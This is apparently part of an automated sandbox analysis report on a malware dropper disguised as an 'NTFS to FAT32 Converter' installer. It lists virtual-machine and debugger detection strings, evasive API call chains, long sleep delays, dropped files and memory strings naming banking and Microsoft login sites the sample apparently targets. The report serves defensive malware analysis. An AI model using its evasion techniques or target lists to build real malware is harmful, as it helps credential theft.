                    Query firmware table information (likely to detect VMs)
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSystem information queried: FirmwareTableInformation
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: regsvr32.exe, 0000000A.00000002.2572840164.000000000283A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE[;
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,5_2_02D8E9B6
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: inet_addr,LoadLibraryA,GetBestInterface,GetProcessHeap,RtlAllocateHeap,GetAdaptersInfo,RtlReAllocateHeap,GetAdaptersInfo,HeapFree,FreeLibrary,FreeLibrary,10_2_0277199C
                    Source: C:\Windows\SysWOW64\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5680
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3951
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6412
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 516
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7156
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2468
                    Source: C:\Windows\SysWOW64\regsvr32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SVEFT.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-F178L.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-UIRHH.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\msvcr100.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1M4E9.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\msvcp100.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-SC9V4.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\is-LIN1F.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-P2BRL.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-RFHNE.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\Qt5Concurrent.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3RIQS.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\user32_8.drv (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1M4E9.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-C2IDQ.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1M4E9.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\Qt5PrintSupport.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\uninstall\is-AJ5Q5.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\icuuc51.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-VR79B.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-95P8U.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\libEGL.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1M4E9.tmp\_isetup\_RegDLL.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3RIQS.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-3S4JD.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SVEFT.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\icuin51.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\libGLESv2.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-4R09J.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_3-5687
                    Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_5-61595
                    Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeAPI coverage: 5.1 %
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe TID: 8924Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe TID: 8612Thread sleep count: 32 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe TID: 8612Thread sleep time: -1920000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 9060Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 9060Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9148Thread sleep count: 5680 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9136Thread sleep count: 3951 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9192Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe TID: 3712Thread sleep time: -210000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6052Thread sleep count: 6412 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6152Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5232Thread sleep count: 516 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4480Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336Thread sleep count: 7156 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6476Thread sleep count: 2468 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6264Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeCode function: 1_2_100081AE FindFirstFileExW,1_2_100081AE
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00452A4C FindFirstFileA,GetLastError,4_2_00452A4C
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,4_2_004751F8
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,4_2_00464048
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,4_2_004644C4
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,4_2_00462ABC
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,4_2_00497A74
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,3_2_00409B30
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeThread delayed: delay time: 60000Jump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: nK8noQeiXl.exe, nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpBinary or memory string: ParallelsVirtualMachine
                    Source: nK8noQeiXl.exe, 00000000.00000003.1361521183.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: powershell.exe, 00000013.00000002.2127597678.000000000521E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: Qv4wdsLMG.tmp, 00000007.00000002.1624878101.0000000000599000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000998000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@]5
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_y
                    Source: nK8noQeiXl.exe, 00000000.00000000.1318171414.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: QEMUU
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.000000000397E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000001.00000002.1819615613.00000000005A4000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2574985165.0000000003350000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2179860571.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2206752083.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1981157929.00000000009CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2179860571.0000000000999000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: powershell.exe, 00000013.00000002.2127597678.000000000521E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: Qv4wdsLMG.tmp, 00000007.00000002.1624878101.0000000000599000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\!
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: regsvr32.exe, 0000000A.00000002.2572840164.000000000283A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: DrjfIAN86u.tmp, 00000004.00000002.2574726751.0000000005CEA000.00000004.00001000.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000000.1568837981.00000000005BF000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: QEMU Copy On Write archive
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpBinary or memory string: xmlphpvlczpl wpl xpacketimport hrefXML:NAMESPACEaid DOCTYPE ELEMENT ENTITY -- <mdb:mork:zAFDR aom saved from url=(-->xmlns=jobwmlRDFnzbsvgkmlgpxCaRxslJDFrssRSStagTAGXMIlmxloclogIMGtmxosmX3DVERCFLRCCncxxbkSCFrtcpseSDOmapnviofcasxdivLogopmlsmilrootpgmlxfdfXFDLBASEtei2xbeljnlpdgmlfeedFEEDinfobeancasevxmlsesxnotesitetasklinkxbrlGAEBXZFXFormqgisSMAIHDMLjsonpsplbodyheadmetadictdocuembedplistTEI.2xliffformsQBXMLTypeseaglehtml5myapptablestyleentrygroupLXFMLwindowdialogSchemaschemacommonCanvaslayoutobjectFFDataReporttaglibARCXMLgnc-v2modulerobloxXDFV:4Xara3DLayoutRDCManattachwidgetreportSchemewebbuyloaderdeviceRDF:RDFweb:RDFoverlayprojectProjectabiwordxdp:xdpsvg:svgCOLLADASOFTPKGfo:rootlm:lmxarchivecollagelibraryHelpTOCpackagesiteMapen-noteFoundryweblinkReportssharingWebPartTestRunpopularsnippetwhpropsQBWCXMLcontentkml:kmlSDOListkDRouteFormSetactionslookupssectionns2:gpxPaletteCatalogProfileTreePadMIFFileKeyFilepayloadPresetsstringsdocumentDocumentNETSCAPEmetalinkresourcenewsItemhtmlplusEnvelopeplandatamoleculelicensesDatabasebindingsWorkbookPlaylistBookFileTimeLinejsp:rootbrowsersfotobookMTSScenemessengercomponentc:contactr:licensex:xmpmetadiscoveryERDiagramWorksheetcrickgridHelpIndexWinampXMLrecoIndexTomTomTocen-exportAnswerSetwinzipjobmuseScorePHONEBOOKm:myListsedmx:EdmxYNABData1workspacePlacemarkMakerFileoor:itemsscriptletcolorBookSignaturexsd:schemadlg:windowFinalDraftVirtualBoxTfrxReportVSTemplateWhiteboardstylesheetBurnWizarddictionaryPCSettingsRedlineXMLBackupMetaxbrli:xbrlFontFamilys:WorkbookFictionBookdia:diagramdefinitionsNmfDocumentSnippetRootSEC:SECMetanet:NetfileCustSectionDieCutLabelPremierDataUserControljsp:includess:Workbookapplicationjsp:useBeancfcomponentparticipantSessionFilejasperReporthelpdocumentxsl:documentxsl:templatePremiereDataSettingsFileCodeSnippetsFileInstancetpmOwnerDataDataTemplateProject_DataTfrReportBSAnote:notepadFieldCatalogUserSettingsgnm:WorkbookLIBRARY_ITEMDocumentDatamso:customUIpicasa2albumrnpddatabasepdfpreflightrn-customizecml:moleculemuveeProjectRelationshipsVisioDocumentxsl:transformD:multistatusKMYMONEY-FILEBackupCatalogfile:ManifestPocketMindMapDiagramLayoutannotationSetLEAPTOFROGANSpublic:attachsoap:EnvelopepersistedQuerymx:ApplicationOverDriveMediaasmv1:assemblyHelpCollectionQvdTableHeaderSCRIBUSUTF8NEWw:wordDocumentPADocumentRootConfigMetadataBorlandProjectDTS:ExecutableMMC_ConsoleFilelibrary:libraryglade-interfacerg:licenseGroupdisco:discoveryAdobeSwatchbookaudacityprojectoffice:documentCoolpixTransfersqueeze_projectwirelessProfileProjectFileInfowsdl:definitionsScrivenerProjectfulfillmentTokenkey:presentationdynamicDiscoverylibrary:librariesClickToDvdProjectDataCladFileStorechat_api_responseMyApplicationDataKeyboardShortcutsDeepBurner_recordXmlTransformationdata.vos.BudgetVOIRIDASCompositionpresentationClipsoor:component-datalibraryDescriptionPowerShellMetadataResourceDictionaryxsf:xDocumentClassoffice:color-tableVisualStudioProjectActiveReportsLayoutwap-provisioningdocAfterEffectsProjectoor:component-sch
                    Source: powershell.exe, 00000013.00000002.2127597678.000000000521E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
